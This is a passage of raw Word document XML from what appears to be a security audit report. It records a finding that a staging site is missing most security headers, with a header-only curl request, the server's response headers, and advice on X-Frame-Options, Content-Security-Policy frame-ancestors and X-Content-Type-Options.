    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="11"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487632384">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>100183</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="116" name="Graphic 116"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="116" name="Graphic 116"/>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7.888497pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15684096;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape86" coordorigin="1440,158" coordsize="2880,0" path="m1440,158l4320,158e" filled="false" stroked="true" strokeweight=".75pt" strokecolor="#000000">
                <v:path arrowok="t"/>
                <v:stroke dashstyle="solid"/>
                <w10:wrap type="topAndBottom"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="110"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>180</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="62"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId271">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy-Report-</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-4"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>Only</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>181</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId272">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://csp-evaluator.withgoogle.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="112"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>alt-svc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>27=":443";ma=86400</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>content-length</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>50</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="582" w:lineRule="exact" w:before="64"/>
        <w:ind w:right="4309"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Example</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>2:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Missing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>most</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>headers </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="178" w:lineRule="exact" w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl -I </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>https://developer.staging.bridgefy.me/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>HTTP/2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>200</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cache-control</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: max-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>age=3600</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>content-type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: text/html; charset=utf-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="720" w:right="1872" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>etag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"9826f49c614b837f52399aab81c800887542e1ea224f9aa620f0b5ce4daf1775" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>last-modified</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: Wed, 11 Jan 2023 20:54:48 GMT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="4742" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>strict-transport-security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>max-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>age=31556926 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>accept-ranges</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: bytes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: Sat, 21 Jan 2023 16:16:49 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GMT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="31"/>
        <w:ind w:left="720" w:right="5930" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>x-served-by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cache-del21724-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DEL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>x-cache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: MISS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>x-cache-hits</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>x-timer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>S1674317809.262483,VS0,VE264</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>vary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: x-fh-requested-host, accept-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>encoding</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>alt-svc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>27=":443";ma=86400</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>content-length</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>5579</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="112"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="720" w:right="364"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>To prevent a host of associated flaws, the following headers require careful</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>review</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>from the developer team:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="370" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>X-Frame-Options</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>: Defines if framing is permitted. While effective to protect from clickjacking attacks, a framable web page can facilitate many other attack scenarios</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>182</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>. SAMEORIGIN or DENY are appropriate values in most cases.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="364" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Some </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>X-Frame-Options </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>limitations may be offset by leveraging the CSP framework, which offers comparable protective guarantees. It is proposed to implement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>simultaneous</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>deployment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Content-Security-Policy: frame-ancestors 'none'; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>header to safeguard users of both modern and older </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>browsers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1440" w:right="364" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>X-Content-Type-Options</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>: Defines if resource MIME sniffing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>should</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
